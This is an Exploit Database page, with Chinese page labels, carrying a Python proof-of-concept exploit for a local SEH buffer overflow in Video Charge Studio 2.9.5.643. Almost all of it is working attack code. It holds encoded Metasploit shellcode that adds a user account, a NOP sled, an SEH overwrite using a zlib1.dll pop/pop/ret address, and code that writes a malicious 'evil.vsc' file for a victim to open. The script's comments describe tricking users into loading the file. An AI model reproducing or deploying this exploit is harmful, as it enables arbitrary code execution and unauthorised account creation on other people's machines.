Video Charge Studio 2.9.5.643 – ‘.vsc’ Local Buffer Overflow (SEH)

• Exploit Database
• 54 阅读

• 作者： xsploited security
  日期： 2010-12-06
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15692/

• #!/usr/bin/python
  # Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
  # Date: 12/05/2010
  # Author: xsploitedsec
  # URL: http://www.x-sploited.com/
  # Contact: xsploitedsecurity [at] x-sploited.com
  # Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
  # Version: <= 2.9.5.643 (Latest)
  # Tested on: Windows XP SP3 (Physical machine)
  # CVE: N/A
  
  ### Software Description: ###
  # Videocharge Studio is a video editing software which is intended for those users who
  # regularly work with video, create Internet video galleries, convert video files.
  # Videocharge Studio includes all features for video editing: video converting, splitting
  # video into parts, joining several video files into a single one, adding watermark on
  # video or image (add logo to video or photo), embedding image into video file, creating
  # video from several images, editing audio. Videocharge Studio can edit video without
  # reencoding as well.
  
  ### Exploit information: ###
  # Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files
  # "Filename" value field.
  # An attacker could trick a user into loading a specially crafted vsc file to execute
  # arbitrary code on a users PC without there consent.
  
  ### Shouts: ###
  # kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
  # Have fun!
  
  # "When you know that you're capable of dealing with whatever comes, you have the only
  # security the world has to offer."					-Harry Browne
  
  import struct
  import sys
  
  about = "=================================================\n"
  about +=" Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n"
  about +=" Author: xsploited security\n URL: http://www.x-sploited.com/\n"
  about +=" Contact: xsploitedsecurity [at] gmail.com\n"
  about +="=================================================\n"
  print about
  
  # msfpayload windows/adduser user=xsploited pass=secEXITFUNC=seh
  # R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a
  # \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt
  # [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)
  
  shellcode = (
  "\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
  "\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf"
  "\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3"
  "\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3"
  "\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6"
  "\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb"
  "\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad"
  "\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2"
  "\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73"
  "\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce"
  "\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8"
  "\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce"
  "\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44"
  "\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9"
  "\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91"
  "\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef"
  "\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe"
  "\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef"
  "\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3"
  "\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae"
  "\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5"
  "\xee\xe0\xf1\xd5\x8a\xcf\xba\x91"
  );
  
  header = (
  "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30"
  "\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d"
  "\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d"
  "\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20"
  "\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c"
  "\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a"
  "\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66"
  "\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46"
  "\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20"
  "\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c"
  "\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d"
  "\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22"
  );
  
  footer = (
  "\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a"
  "\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d"
  "\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e"
  );
  
  size = 824; #824 junk bytes triggers the bof
  
  payload = "\x90" * (size - len(shellcode));
  payload += shellcode
  
  payload += "\xEB\x06\x90\x90"; #jmp short
  payload += struct.pack("<L",0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
  payload += "\xe9\xe0\xfc\xff\xff"; #jmp back 800 bytes
  
  xsploit = header + payload+ footer;
  
  print("[*] Creating .vsc file");
  print "[*] Payload size = " + str(len(payload)) + " bytes";
  
  try:
  	out_file = open("evil.vsc",'w');
  	out_file.write(xsploit);
  	out_file.close();
  	print("[*] Malicious vsc file created successfully");
  	print("[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n");
  except:
  	print "[!] Error creating file";